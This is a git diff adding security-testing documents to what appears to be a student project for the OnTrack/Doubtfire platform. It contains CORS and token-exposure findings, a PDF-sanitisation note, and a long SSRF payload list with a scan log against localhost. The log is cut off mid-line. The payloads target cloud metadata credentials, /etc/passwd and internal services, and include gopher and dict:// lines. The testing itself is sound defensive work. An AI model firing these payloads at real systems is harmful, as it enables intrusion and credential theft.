+HTTP/1.1 200 OK +... +Content-Security-Policy: default-src https: 'unsafe-inline' 'unsafe-eval' blob: data: ws: +X-Frame-Options: SAMEORIGIN +Strict-Transport-Security: max-age=31536000 +... +(No Access-Control-Allow-Origin header present) +``` +✅ No CORS headers were exposed in the default response. + +#### 4.2 Response to Custom Origin Header (`https://evil.com`) + +``` +HTTP/1.1 200 OK +... +(No Access-Control-Allow-Origin or Access-Control-Allow-Credentials header present) +``` +✅ The server did not reflect the Origin or permit cross-origin requests. + +#### Conclusion on Findings + +- The production server does **not** respond with `Access-Control-Allow-Origin: *` +- It does **not** reflect arbitrary Origin values +- It does **not** allow credentialed cross-origin requests + +This indicates that CORS is correctly and securely configured in the production environment. + +--- + +### Contextual Comparison with Prior Findings + +| Aspect | Prior Report (Dev/Test Env) | Current Test (Production Env) | +|------------------------------|-------------------------------------|------------------------------------| +| **Environment** | http://172.18.0.1:4200 (Internal) | https://ontrack.deakin.edu.au | +| **CORS Header** | Access-Control-Allow-Origin: * | Not present | +| **Vulnerability** | Vulnerable to CORS exploitation | Not vulnerable | +| **Authentication Bypass** | Moderate (pending token) | None observed | + +--- + +### Recommendations + +#### Already Implemented in Production + +- CORS headers are not exposed by default +- No wildcard or reflective origin headers +- Appropriate HTTP security headers (HSTS, X-Frame-Options, CSP) are implemented + +#### Recommended Actions + +- **Audit Internal Environments:** + Review and harden the CORS policy in all non-production environments. The vulnerability identified at `http://172.18.0.1:4200` should be addressed to avoid accidental exposure during deployments. + +- **Enforce Whitelisted Origins:** + For both development and production, explicitly specify trusted origins rather than using `*`. + +- **Avoid Credentials with Wildcard Origins:** + If cross-origin credentials (cookies, tokens) are ever required, ensure: + - `Access-Control-Allow-Credentials: true` + - `Access-Control-Allow-Origin` is a specific trusted domain (not `*`) + +- **Automated CORS Monitoring:** + Integrate automated header scanning into CI/CD pipelines to detect any future misconfiguration. + +- **Security Awareness:** + Ensure development teams understand the risk of permissive CORS settings and only use them when absolutely necessary (e.g., during local dev with appropriate restrictions). + +--- + +### References + +- [MDN Web Docs - CORS](https://developer.mozilla.org/en-US/docs/Web/HTTP/CORS) +- [OWASP - CORS Misconfiguration](https://owasp.org/www-community/attacks/CORS_OriginHeaderScrutiny) +- [CWE-942: Overly Permissive CORS Policy](https://cwe.mitre.org/data/definitions/942.html) + +--- + +### Conclusion + +Based on the tests conducted on the production environment of OnTrack (`https://ontrack.deakin.edu.au`), there is no CORS misconfiguration present. The server correctly avoids reflecting arbitrary origins and does not expose unsafe CORS headers. + +The previously identified issue appears to affect only a non-production deployment and should still be addressed. The production configuration adheres to best practices and does not pose a CORS-related security risk at this time. diff --git a/src/content/docs/security/Images/CORS.png b/src/content/docs/security/Images/CORS.png new file mode 100644 index 00000000..3cba96db Binary files /dev/null and b/src/content/docs/security/Images/CORS.png differ diff --git a/src/content/docs/security/T1-2025/InsecureTokenHTTP.md b/src/content/docs/security/T1-2025/InsecureTokenHTTP.md new file mode 100644 index 00000000..737dc82e --- /dev/null +++ b/src/content/docs/security/T1-2025/InsecureTokenHTTP.md @@ -0,0 +1,102 @@ +--- +title: Insecure Token Exposure +--- + +_Lachlan Robinson (220325142)_ + +## Summary of Finding + +The OnTrack application issues a persistent authentication token after user login, which is included in HTTP headers for all subsequent API requests. In the development environment, these requests are made over unencrypted HTTP, allowing authentication tokens to be intercepted by attackers on the same network. This exposes users to session hijacking and unauthorized access. + +## Assessment and Remediation Status + +Development: Not Remediated – HTTP is still in use, leaving authentication tokens exposed during development and testing. + +```conf +http { + include /etc/nginx/mime.types; + + sendfile on; + + server { + root /usr/share/nginx/html/; + index index.html; + listen 80; + + add_header Content-Security-Policy "default-src https: 'unsafe-inline' 'unsafe-eval' blob: data: ws:" always; + # Feature-Policy is deprecated, Permissions-Policy is used + add_header Permissions-Policy "microphone=(self),speaker=(self),fullscreen=(self),payment=(none)" always; + } + + gzip on; + gzip_types text/css application/javascript; + gzip_proxied any; + gzip_buffers 32 8k; +} +} +``` + +Production: Remediated – HTTPS is enforced and HTTP is redirected securely. + +```conf +http { + underscores_in_headers on; + + # Redirect HTTP to HTTPS and remove 'www' + server { + listen 80; + server_name www.example.com example.com; # Replace with actual domain + return 301 https://example.com$request_uri; + } + + # Redirect HTTPS 'www' to bare domain + server { + listen 443 ssl; + server_name www.example.com; # Replace with actual domain + ssl_certificate /etc/nginx/ssl/fullchain.pem; # Replace with real certificate path + ssl_certificate_key /etc/nginx/ssl/private.key; # Replace with real key path + + underscores_in_headers on; + return 301 https://example.com$request_uri; + } + + # Main HTTPS server block + server { + listen 443 ssl; + server_name example.com; # Replace with actual domain + ssl_certificate /etc/nginx/ssl/fullchain.pem; # Replace with real certificate path + ssl_certificate_key /etc/nginx/ssl/private.key; # Replace with real key path + + # API requests proxy + location /api { + proxy_set_header Host $host; + proxy_set_header X-Real-IP $remote_addr; + proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for; + proxy_set_header X-Forwarded-Proto $scheme; + + proxy_pass http://backend-api:3000; # Replace with actual service name or IP + proxy_read_timeout 90; + } + + # Static files or frontend app + location / { + proxy_set_header Host $host; + proxy_set_header X-Real-IP $remote_addr; + proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for; + proxy_set_header X-Forwarded-Proto $scheme; + + proxy_pass http://frontend-web:80; # Replace with actual service name or IP + proxy_read_timeout 90; + } + } +} +``` + +While token transmission over HTTP is generally a security concern, this finding applies only to the development environment, which is not publicly accessible and is typically used with fake data on local networks. The production environment, which users interact with, enforces HTTPS, preventing token interception in real-world use. This issue is considered a false positive. No remediation is required in the development environment, as it does not expose end users or sensitive data in production. + +## Recommendation for Retesting + +No retesting required unless production configuration changes. Future security testing should: + +- Focus on verifying that HTTPS is enforced in production builds. +- Exclude local development environments from vulnerability assessments unless explicitly required. diff --git a/src/content/docs/security/pdf-security-updates.md b/src/content/docs/security/pdf-security-updates.md new file mode 100644 index 00000000..e6d0b1aa --- /dev/null +++ b/src/content/docs/security/pdf-security-updates.md @@ -0,0 +1,48 @@ +# PDF Security Updates + +## Overview +This document outlines the changes made to address a malicious code execution vulnerability related to the handling of PDFs in the Doubtfire application. + +## Potential Impact if Unfixed +If this vulnerability is not addressed, attackers could upload PDFs containing embedded JavaScript or other malicious payloads. When these files are viewed, the malicious code could execute in the user's browser, potentially leading to: +- Unauthorized access to user data or session tokens. +- Execution of arbitrary code in the context of the application. +- Phishing attacks or redirection to malicious sites. +- Compromise of user accounts or escalation of privileges. + +## Changes Implemented + +### 1. Sanitize Uploaded PDFs +- Implemented server-side scanning for malicious JavaScript embedded in PDFs. +- **Action Taken:** Added a validation step during PDF uploads to detect and reject files containing embedded JavaScript or other malicious content. + +### 2. Restrict or Disable JavaScript Execution in PDF Viewers +- JavaScript execution in PDFs is not required for the application. +- **Action Taken:** Configured the PDF viewer to disable JavaScript execution entirely, ensuring that no embedded scripts can run. + +## Affected Components +The following components and files were updated as part of this security enhancement: +- **doubtfire-web:** + - Updated the PDF.js integration and disabled JavaScript execution in the file viewer. + - **Affected file:** `file-viewer.component.html` +- **doubtfire-api:** + - Added server-side validation to sanitize uploaded PDFs. + - **Affected files:** `file_helper.rb`, `file_helper_test.rb` + +## Recommendations +- Regularly update dependencies like PDF.js to their latest secure versions. +- Continuously monitor for vulnerabilities in third-party libraries and implement patches promptly. +- **Sanitization for Other File Types:** + - Strip metadata and embedded scripts from image files (e.g., using tools like ExifTool). + - Validate and sanitize document files (e.g., DOCX, XLSX) using libraries that remove macros and embedded objects. + - Restrict allowed file types and enforce strict MIME type checking. + - Limit file size and scan for known exploit patterns. + +## References +- [PDF.js Security Updates](https://github.com/mozilla/pdf.js/releases) +- [OWASP File Upload Security Guidelines](https://owasp.org/www-community/vulnerabilities/Unrestricted_File_Upload) + +## Version History +- **Version:** 1.0 +- **Date:** 07/05/2025 +- **Author:** Ibitope Fatoki diff --git a/src/ssrf/api_endpoints.txt b/src/ssrf/api_endpoints.txt new file mode 100644 index 00000000..ff38b9d6 --- /dev/null +++ b/src/ssrf/api_endpoints.txt @@ -0,0 +1,25 @@ +/api/activity_types +/ +/api/admin/overseer_images +/api/auth +/api/campuses +/api/csv +/api/projects +/api/settings +/api/students +/api/submission +/api/tasks +/api/teaching_periods +/api/tii_actions +/api/tii_eula +/api/tii_hook +/api/tutorials +/api/unit_roles +/api/units +/api/users +/api/webcal +/api/docs +/api/internal +/api/logs +/api/config +/api/auth_test diff --git a/src/ssrf/payloads.txt b/src/ssrf/payloads.txt new file mode 100644 index 00000000..775a2e2b --- /dev/null +++ b/src/ssrf/payloads.txt @@ -0,0 +1,321 @@ +169.254.169.254/latest/meta-data/ +metadata.google.internal/computeMetadata/v1/ +localhost:8080/admin +file:///etc/passwd +file:///proc/self/environ +localhost:3000/admin +127.0.0.1:3000/config +localhost:3000/api/internal +localhost:3000/rails/info +localhost:3000/logs +mysql://127.0.0.1:3306/ +mysql://localhost:3306/ +redis://127.0.0.1:6379/ +redis://localhost:6379/ +127.0.0.1:9876/ +127.0.0.1:54247/ +127.0.0.1:59465/ +file:///var/log/nginx/access.log +localhost:4200/.git/config +169.254.169.254/metadata/instance +localhost:4200/api/docs/ +localhost:4200/api/internal +localhost:4200/api/logs +localhost:4200/api/config +localhost:4200/api/auth_test +localhost:4200/api/overseer_images +localhost:4200/api/campuses +localhost:4200/api/csv +localhost:4200/api/projects +localhost:4200/api/settings +localhost:4200/api/students +localhost:4200/api/submission +localhost:4200/api/tasks +localhost:4200/api/teaching_periods +localhost:4200/api/tii_actions +localhost:4200/api/tii_eula +localhost:4200/api/tii_hook +localhost:4200/api/tutorials +localhost:4200/api/unit_roles +localhost:4200/api/units +localhost:4200/api/users +localhost:4200/.env +localhost:4200/.git +127.0.0.1:80 +127.0.0.1:443 +127.0.0.1:22 +127.1:80 +0 +0.0.0.0:80 +localhost:80 +[::]:80/ +[::]:25/ SMTP +[::]:3128/ Squid +[0000::1]:80/ +[0:0:0:0:0:ffff:127.0.0.1]/thefile +①②⑦.⓪.⓪.⓪ +127.127.127.127 +127.0.1.3 +127.0.0.0 +2130706433 +017700000001 +0x7f000001 +google.com@127.0.0.1 +127.0.0.1#google.com +google.com.127.0.0.1 +127.0.0.1/google.com +127.0.0.1/?d=google.com + +google.com@127.0.0.1 + +127.0.0.1#google.com + +google.com.127.0.0.1 + +127.0.0.1/google.com + +127.0.0.1/?d=google.com +google.com@localhost +localhost#google.com +google.com.localhost +localhost/google.com +localhost/?d=google.com +127.0.0.1%00google.com +127.0.0.1?google.com +127.0.0.1///google.com + +127.0.0.1%00google.com + +127.0.0.1?google.com + +127.0.0.1///google.com +localtest.me +http:@0/ +[::]:80 +127。0。0。1 +127%E3%80%820%E3%80%820%E3%80%821 +2130706433/ +3232235521/ +3232235777/ +0177.0000.0000.0001 +00000177.00000000.00000000.00000001 +127.0.0.1 +0x7f000001/ +0xc0a80014/ +0x7f.0x00.0x00.0x01 +0x0000007f.0x00000000.0x00000000.0x00000001 +127.000000000000.1 +localhost:+11211aaa +localhost:00011211aaaa +0/ +127.1 +127.0.1 +localtest.me +customer1.app.localhost.my.company.127.0.0.1.nip.io +mail.ebc.apple.com +127.0.0.1.nip.io +www.example.com.customlookup.www.google.com.endcustom.sentinel.pentesting.us +customer1.app.localhost.my.company.127.0.0.1.nip.io +bugbounty.dod.network +1ynrnhl.xip.io +spoofed.burpcollaborator.net +customer1.app.localhost.my.company.127.0.0.1.nip.io +spoofed.burpcollaborator.net +127.1.1.1:80\@127.2.2.2:80/ +127.1.1.1:80\@@127.2.2.2:80/ +127.1.1.1:80:\@@127.2.2.2:80/ +127.1.1.1:80#\@127.2.2.2:80/ +127.0.1.3 +0 +127.1 +127.0.1 +localhost +1.0.0.127.in-addr.arpa +01111111000000000000000000000001 +0x7f.0x0.0x0.0x1 +0177.0.0.01 +7F000001 +2130706433 +6425673729 +127001 +127_0._0_1 +0000::1 +0000::1:80 +::ffff:7f00:0001 +0000:0000:0000:0000:0000:ffff:7f00:0001 +localtest.me +bugbounty.dod.network +127.127.127.127 +0177.0.0.1 +⓪ⓧⓐ⑨。⓪ⓧⓕⓔ。⓪ⓧⓐ⑨。⓪ⓧⓕⓔ:80 +⓪ⓧⓐ⑨ⓕⓔⓐ⑨ⓕⓔ:80 +②⑧⑤②⓪③⑨①⑥⑥:80 +⓪②⑤①。⓪③⑦⑥。⓪②⑤①。⓪③⑦⑥:80 +whitelisted@127.0.0.1 +0x7f000001 +017700000001 +0177.00.00.01 +0000.0000.0000.0000 +0177.0000.0000.0001 +0177.0001.0000..0001 +0x7f.0x1.0x0.0x1 +0x7f.0x1.0x1 +ht�️tp://12�7.0.0.1 +loopback:+11211aaa +loopback:00011211aaaa +⑯⑨。②⑤④。⑯⑨。②⑤④ +169.254.169.254 +2852039166 +7147006462 +0xa9.0xfe.0xa9.0xfe +0251.0376.0251.0376 +169。254。169。254 +169。254。169。254 +④②⑤。⑤①⓪。④②⑤。⑤①⓪:80 +⓪⓪②⑤①。⓪⓪⓪③⑦⑥。⓪⓪⓪⓪②⑤①。⓪⓪⓪⓪⓪③⑦⑥:80 +[::①⑥⑨。②⑤④。⑯⑨。②⑤④]:80 +[::ⓕⓕⓕⓕ:①⑥⑨。②⑤④。⑯⑨。②⑤④]:80 +⓪ⓧⓐ⑨。⓪③⑦⑥。④③⑤①⑧:80 +⓪ⓧⓐ⑨。⑯⑥⑧⑨⑥⑥②:80 +⓪⓪②⑤①。⑯⑥⑧⑨⑥⑥②:80 +⓪⓪②⑤①。⓪ⓧⓕⓔ。④③⑤①⑧:80 +dict://attacker:11111 +file:///etc/passwd +file://\/\/etc/passwd +file://path/to/file +gopher://metadata.google.internal:80/xGET%20/computeMetadata/v1/instance/attributes/ssh-keys%20HTTP%2f%31%2e%31%0AHost:%20metadata.google.internal%0AAccept:%20%2a%2f%2a%0aMetadata-Flavor:%20Google%0d%0a +gopher://nozaki.io/_SSRF%0ATest! +0.0.0.0:22 +0.0.0.0:443 +0.0.0.0:80 +0.0.0.0:3389 +0000::1:22 +0000::1:25 +0000::1:3128 +0000::1:3389 +0251.00376.000251.0000376 +0x41414141A9FEA9FE +0xA9.0xFE.0xA9.0xFE +0xA9FEA9FE +0xa9fea9fe +100.100.100.200/latest/meta-data/ +100.100.100.200/latest/meta-data/image-id +100.100.100.200/latest/meta-data/instance-id +127.0.0.0 +127.0.0.1:22 +127.0.0.1:2379/version +127.0.0.1:443 +127.0.0.1:80 +127.0.0.1:3389 +127.0.0.1:8000 +127.0.0.1:9901 +127.0.0.1:8001 +127.0.0.1:8444 +127.1.1.1 +127.1.1.1:80#\@127.2.2.2:80 +127.1.1.1:80:\@@127.2.2.2:80 +127.1.1.1:80\@127.2.2.2:80 +127.1.1.1:80\@@127.2.2.2:80 +127.127.127.127.nip.io +169.254.169.254.xip.io +169.254.169.254/computeMetadata/v1/ +169.254.169.254/latest/dynamic/instance-identity/document +169.254.169.254/latest/meta-data/ +169.254.169.254/latest/meta-data/ami-id +169.254.169.254/latest/meta-data/hostname +169.254.169.254/latest/meta-data/iam/security-credentials/ +169.254.169.254/latest/meta-data/iam/security-credentials/PhotonInstance +169.254.169.254/latest/meta-data/iam/security-credentials/dummy +169.254.169.254/latest/meta-data/iam/security-credentials/s3access +169.254.169.254/latest/meta-data/public-keys/ +169.254.169.254/latest/meta-data/public-keys/0/openssh-key +169.254.169.254/latest/meta-data/public-keys/[ID]/openssh-key +169.254.169.254/latest/meta-data/reservation-id +169.254.169.254/latest/user-data +169.254.169.254/latest/user-data/iam/security-credentials/ +192.0.0.192/latest/ +192.0.0.192/latest/attributes/ +192.0.0.192/latest/meta-data/ +192.0.0.192/latest/user-data/ +3232235521 +3232235777 +425.510.425.510 +[0:0:0:0:0:ffff:127.0.0.1] +[0:0:0:0:0:ffff:127.0.0.1]:8000 +[0:0:0:0:0:ffff:127.0.0.1]:8001 +[0:0:0:0:0:ffff:127.0.0.1]:8444 +[0:0:0:0:0:ffff:127.0.0.1]:9901 +[::] +[::]:22 +[::]:25 +[::]:3128 +[::]:80 +[::]:3389 +[::]:8000 +[::]:8001 +[::]:8444 +[::]:9901 +app-169-254-169-254.nip.io +customer2-app-169-254-169-254.nip.io +instance-data +localhost:22 +localhost:443 +localhost:80 +localhost:3389 +localhost:8000 +localhost:8001 +localhost:8444 +localhost:9901 +localhost.localdomain +loopback +loopback:22 +loopback:80 +loopback:443 +loopback:3389 +loopback:8000 +loopback:9901 +loopback:8001 +loopback:8444 +ipcop.localdomain:8443 +metadata.google.internal/computeMetadata/v1/ +metadata.google.internal/computeMetadata/v1/instance/hostname +metadata.google.internal/computeMetadata/v1/instance/id +metadata.google.internal/computeMetadata/v1/project/project-id +metadata.nicob.net +owasp.org.169.254.169.254.nip.io +ssrf-169.254.169.254.localdomain.pw +ssrf-cloud.localdomain.pw +www.owasp.org.1ynrnhl.xip.io +127.1:80 +[::]:80/ +[::]:25/ SMTP +[::]:3128/ Squid +[0000::1]:80/ +[0:0:0:0:0:ffff:127.0.0.1]/thefile +①②⑦.⓪.⓪.⓪ +2130706433/ +3232235521/ +3232235777/ +0x7f000001/ +0xc0a80014/ +{domain}@127.0.0.1 +127.0.0.1#{domain} +{domain}.127.0.0.1 +127.0.0.1/{domain} +127.0.0.1/?d={domain} +{domain}@localhost +localhost#{domain} +{domain}.localhost +localhost/{domain} +localhost/?d={domain} +127.0.0.1%00{domain} +127.0.0.1?{domain} +127.0.0.1///{domain} +127.0.0.1///{domain}st:+11211aaa +st:00011211aaaa +0/ +1.1.1.1 &@2.2.2.2# @3.3.3.3/ +127.1.1.1:80\\@127.2.2.2:80/ +127.1.1.1:80\\@@127.2.2.2:80/ +127.1.1.1:80:\\@@127.2.2.2:80/ +127.1.1.1:80#\\@127.2.2.2:80/ diff --git a/src/ssrf/ssrf_logs/slow_endpoints_2025-04-16_17-02-13.md b/src/ssrf/ssrf_logs/slow_endpoints_2025-04-16_17-02-13.md new file mode 100644 index 00000000..36633d58 --- /dev/null +++ b/src/ssrf/ssrf_logs/slow_endpoints_2025-04-16_17-02-13.md @@ -0,0 +1,8 @@ +# Slow or Unresponsive Endpoints +**Logged on Wed Apr 16 17:02:13 AEST 2025** +**Target: http://localhost:4200** +**Request Method: GET** +**Max Time: 7 seconds** +**API Wordlist: api_endpoints.txt** +**Payload Wordlist: payloads.txt** + diff --git a/src/ssrf/ssrf_logs/slow_endpoints_2025-04-16_17-13-28.md b/src/ssrf/ssrf_logs/slow_endpoints_2025-04-16_17-13-28.md new file mode 100644 index 00000000..677e037e --- /dev/null +++ b/src/ssrf/ssrf_logs/slow_endpoints_2025-04-16_17-13-28.md @@ -0,0 +1,8 @@ +# Slow or Unresponsive Endpoints +**Logged on Wed Apr 16 17:13:28 AEST 2025** +**Target: http://localhost:4200** +**Request Method: POST** +**Max Time: 7 seconds** +**API Wordlist: api_endpoints.txt** +**Payload Wordlist: payloads.txt** + diff --git a/src/ssrf/ssrf_logs/ssrf_test_results_2025-04-16_17-02-13.md b/src/ssrf/ssrf_logs/ssrf_test_results_2025-04-16_17-02-13.md new file mode 100644 index 00000000..fa600570 --- /dev/null +++ b/src/ssrf/ssrf_logs/ssrf_test_results_2025-04-16_17-02-13.md @@ -0,0 +1,8394 @@ +# SSRF Test Results +**Scan started on Wed Apr 16 17:02:13 AEST 2025** +**Target: http://localhost:4200** +**Request Method: GET** +**Max Time: 7 seconds** +**API Wordlist: api_endpoints.txt** +**Payload Wordlist: payloads.txt** + + +======================================================== + 😎 SSRF Mapping & Testing Script 😎 + Made with tears and possibly love by Ibi +======================================================== + + 🚀 #Starting SSRF testing for http://localhost:4200 +## Testing endpoint: http://localhost:4200/api/activity_types +- Testing: `http://localhost:4200/api/activity_types?url=169.254.169.254%2Flatest%2Fmeta-data%2F` +- Testing: `http://localhost:4200/api/activity_types?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2F` +- Testing: `http://localhost:4200/api/activity_types?url=localhost%3A8080%2Fadmin` +- Testing: `http://localhost:4200/api/activity_types?url=file%3A%2F%2F%2Fetc%2Fpasswd` +- Testing: `http://localhost:4200/api/activity_types?url=file%3A%2F%2F%2Fproc%2Fself%2Fenviron` +- Testing: `http://localhost:4200/api/activity_types?url=localhost%3A3000%2Fadmin` +- Testing: `http://localhost:4200/api/activity_types?url=127.0.0.1%3A3000%2Fconfig` +- Testing: `http://localhost:4200/api/activity_types?url=localhost%3A3000%2Fapi%2Finternal` +- Testing: `http://localhost:4200/api/activity_types?url=localhost%3A3000%2Frails%2Finfo` +- Testing: `http://localhost:4200/api/activity_types?url=localhost%3A3000%2Flogs` +- Testing: `http://localhost:4200/api/activity_types?url=mysql%3A%2F%2F127.0.0.1%3A3306%2F` +- Testing: `http://localhost:4200/api/activity_types?url=mysql%3A%2F%2Flocalhost%3A3306%2F` +- Testing: `http://localhost:4200/api/activity_types?url=redis%3A%2F%2F127.0.0.1%3A6379%2F` +- Testing: `http://localhost:4200/api/activity_types?url=redis%3A%2F%2Flocalhost%3A6379%2F` +- Testing: `http://localhost:4200/api/activity_types?url=127.0.0.1%3A9876%2F` +- Testing: `http://localhost:4200/api/activity_types?url=127.0.0.1%3A54247%2F` +- Testing: `http://localhost:4200/api/activity_types?url=127.0.0.1%3A59465%2F` +- Testing: `http://localhost:4200/api/activity_types?url=file%3A%2F%2F%2Fvar%2Flog%2Fnginx%2Faccess.log` +- Testing: `http://localhost:4200/api/activity_types?url=localhost%3A4200%2F.git%2Fconfig` +- Testing: `http://localhost:4200/api/activity_types?url=169.254.169.254%2Fmetadata%2Finstance` +- Testing: `http://localhost:4200/api/activity_types?url=localhost%3A4200%2Fapi%2Fdocs%2F` +- Testing: `http://localhost:4200/api/activity_types?url=localhost%3A4200%2Fapi%2Finternal` +- Testing: `http://localhost:4200/api/activity_types?url=localhost%3A4200%2Fapi%2Flogs` +- Testing: `http://localhost:4200/api/activity_types?url=localhost%3A4200%2Fapi%2Fconfig` +- Testing: `http://localhost:4200/api/activity_types?url=localhost%3A4200%2Fapi%2Fauth_test` +- Testing: `http://localhost:4200/api/activity_types?url=localhost%3A4200%2Fapi%2Foverseer_images` +- Testing: `http://localhost:4200/api/activity_types?url=localhost%3A4200%2Fapi%2Fcampuses` +- Testing: `http://localhost:4200/api/activity_types?url=localhost%3A4200%2Fapi%2Fcsv` +- Testing: `http://localhost:4200/api/activity_types?url=localhost%3A4200%2Fapi%2Fprojects` +- Testing: `http://localhost:4200/api/activity_types?url=localhost%3A4200%2Fapi%2Fsettings` +- Testing: `http://localhost:4200/api/activity_types?url=localhost%3A4200%2Fapi%2Fstudents` +- Testing: `http://localhost:4200/api/activity_types?url=localhost%3A4200%2Fapi%2Fsubmission` +- Testing: `http://localhost:4200/api/activity_types?url=localhost%3A4200%2Fapi%2Ftasks` +- Testing: `http://localhost:4200/api/activity_types?url=localhost%3A4200%2Fapi%2Fteaching_periods` +- Testing: `http://localhost:4200/api/activity_types?url=localhost%3A4200%2Fapi%2Ftii_actions` +- Testing: `http://localhost:4200/api/activity_types?url=localhost%3A4200%2Fapi%2Ftii_eula` +- Testing: `http://localhost:4200/api/activity_types?url=localhost%3A4200%2Fapi%2Ftii_hook` +- Testing: `http://localhost:4200/api/activity_types?url=localhost%3A4200%2Fapi%2Ftutorials` +- Testing: `http://localhost:4200/api/activity_types?url=localhost%3A4200%2Fapi%2Funit_roles` +- Testing: `http://localhost:4200/api/activity_types?url=localhost%3A4200%2Fapi%2Funits` +- Testing: `http://localhost:4200/api/activity_types?url=localhost%3A4200%2Fapi%2Fusers` +- Testing: `http://localhost:4200/api/activity_types?url=localhost%3A4200%2F.env` +- Testing: `http://localhost:4200/api/activity_types?url=localhost%3A4200%2F.git` +- Testing: `http://localhost:4200/api/activity_types?url=127.0.0.1%3A80` +- Testing: `http://localhost:4200/api/activity_types?url=127.0.0.1%3A443` +- Testing: `http://localhost:4200/api/activity_types?url=127.0.0.1%3A22` +- Testing: `http://localhost:4200/api/activity_types?url=127.1%3A80` +- Testing: `http://localhost:4200/api/activity_types?url=0` +- Testing: `http://localhost:4200/api/activity_types?url=0.0.0.0%3A80` +- Testing: `http://localhost:4200/api/activity_types?url=localhost%3A80` +- Testing: `http://localhost:4200/api/activity_types?url=%5B%3A%3A%5D%3A80%2F` +- Testing: `http://localhost:4200/api/activity_types?url=%5B%3A%3A%5D%3A25%2F%20SMTP` +- Testing: `http://localhost:4200/api/activity_types?url=%5B%3A%3A%5D%3A3128%2F%20Squid` +- Testing: `http://localhost:4200/api/activity_types?url=%5B0000%3A%3A1%5D%3A80%2F` +- Testing: `http://localhost:4200/api/activity_types?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%2Fthefile` +- Testing: `http://localhost:4200/api/activity_types?url=%E2%91%A0%E2%91%A1%E2%91%A6.%E2%93%AA.%E2%93%AA.%E2%93%AA` +- Testing: `http://localhost:4200/api/activity_types?url=127.127.127.127` +- Testing: `http://localhost:4200/api/activity_types?url=127.0.1.3` +- Testing: `http://localhost:4200/api/activity_types?url=127.0.0.0` +- Testing: `http://localhost:4200/api/activity_types?url=2130706433` +- Testing: `http://localhost:4200/api/activity_types?url=017700000001` +- Testing: `http://localhost:4200/api/activity_types?url=0x7f000001` +- Testing: `http://localhost:4200/api/activity_types?url=google.com%40127.0.0.1` +- Testing: `http://localhost:4200/api/activity_types?url=127.0.0.1%23google.com` +- Testing: `http://localhost:4200/api/activity_types?url=google.com.127.0.0.1` +- Testing: `http://localhost:4200/api/activity_types?url=127.0.0.1%2Fgoogle.com` +- Testing: `http://localhost:4200/api/activity_types?url=127.0.0.1%2F%3Fd%3Dgoogle.com` +- Testing: `http://localhost:4200/api/activity_types?url=` +- Testing: `http://localhost:4200/api/activity_types?url=google.com%40127.0.0.1` +- Testing: `http://localhost:4200/api/activity_types?url=` +- Testing: `http://localhost:4200/api/activity_types?url=127.0.0.1%23google.com` +- Testing: `http://localhost:4200/api/activity_types?url=` +- Testing: `http://localhost:4200/api/activity_types?url=google.com.127.0.0.1` +- Testing: `http://localhost:4200/api/activity_types?url=` +- Testing: `http://localhost:4200/api/activity_types?url=127.0.0.1%2Fgoogle.com` +- Testing: `http://localhost:4200/api/activity_types?url=` +- Testing: `http://localhost:4200/api/activity_types?url=127.0.0.1%2F%3Fd%3Dgoogle.com` +- Testing: `http://localhost:4200/api/activity_types?url=google.com%40localhost` +- Testing: `http://localhost:4200/api/activity_types?url=localhost%23google.com` +- Testing: `http://localhost:4200/api/activity_types?url=google.com.localhost` +- Testing: `http://localhost:4200/api/activity_types?url=localhost%2Fgoogle.com` +- Testing: `http://localhost:4200/api/activity_types?url=localhost%2F%3Fd%3Dgoogle.com` +- Testing: `http://localhost:4200/api/activity_types?url=127.0.0.1%2500google.com` +- Testing: `http://localhost:4200/api/activity_types?url=127.0.0.1%3Fgoogle.com` +- Testing: `http://localhost:4200/api/activity_types?url=127.0.0.1%2F%2F%2Fgoogle.com` +- Testing: `http://localhost:4200/api/activity_types?url=` +- Testing: `http://localhost:4200/api/activity_types?url=127.0.0.1%2500google.com` +- Testing: `http://localhost:4200/api/activity_types?url=` +- Testing: `http://localhost:4200/api/activity_types?url=127.0.0.1%3Fgoogle.com` +- Testing: `http://localhost:4200/api/activity_types?url=` +- Testing: `http://localhost:4200/api/activity_types?url=127.0.0.1%2F%2F%2Fgoogle.com` +- Testing: `http://localhost:4200/api/activity_types?url=localtest.me` +- Testing: `http://localhost:4200/api/activity_types?url=http%3A%400%2F` +- Testing: `http://localhost:4200/api/activity_types?url=%5B%3A%3A%5D%3A80` +- Testing: `http://localhost:4200/api/activity_types?url=127%E3%80%820%E3%80%820%E3%80%821` +- Testing: `http://localhost:4200/api/activity_types?url=127%25E3%2580%25820%25E3%2580%25820%25E3%2580%25821` +- Testing: `http://localhost:4200/api/activity_types?url=2130706433%2F` +- Testing: `http://localhost:4200/api/activity_types?url=3232235521%2F` +- Testing: `http://localhost:4200/api/activity_types?url=3232235777%2F` +- Testing: `http://localhost:4200/api/activity_types?url=0177.0000.0000.0001` +- Testing: `http://localhost:4200/api/activity_types?url=00000177.00000000.00000000.00000001` +- Testing: `http://localhost:4200/api/activity_types?url=127.0.0.1` +- Testing: `http://localhost:4200/api/activity_types?url=0x7f000001%2F` +- Testing: `http://localhost:4200/api/activity_types?url=0xc0a80014%2F` +- Testing: `http://localhost:4200/api/activity_types?url=0x7f.0x00.0x00.0x01` +- Testing: `http://localhost:4200/api/activity_types?url=0x0000007f.0x00000000.0x00000000.0x00000001` +- Testing: `http://localhost:4200/api/activity_types?url=127.000000000000.1` +- Testing: `http://localhost:4200/api/activity_types?url=localhost%3A%2B11211aaa` +- Testing: `http://localhost:4200/api/activity_types?url=localhost%3A00011211aaaa` +- Testing: `http://localhost:4200/api/activity_types?url=0%2F` +- Testing: `http://localhost:4200/api/activity_types?url=127.1` +- Testing: `http://localhost:4200/api/activity_types?url=127.0.1` +- Testing: `http://localhost:4200/api/activity_types?url=localtest.me` +- Testing: `http://localhost:4200/api/activity_types?url=customer1.app.localhost.my.company.127.0.0.1.nip.io` +- Testing: `http://localhost:4200/api/activity_types?url=mail.ebc.apple.com` +- Testing: `http://localhost:4200/api/activity_types?url=127.0.0.1.nip.io` +- Testing: `http://localhost:4200/api/activity_types?url=www.example.com.customlookup.www.google.com.endcustom.sentinel.pentesting.us` +- Testing: `http://localhost:4200/api/activity_types?url=customer1.app.localhost.my.company.127.0.0.1.nip.io` +- Testing: `http://localhost:4200/api/activity_types?url=bugbounty.dod.network` +- Testing: `http://localhost:4200/api/activity_types?url=1ynrnhl.xip.io` +- Testing: `http://localhost:4200/api/activity_types?url=spoofed.burpcollaborator.net` +- Testing: 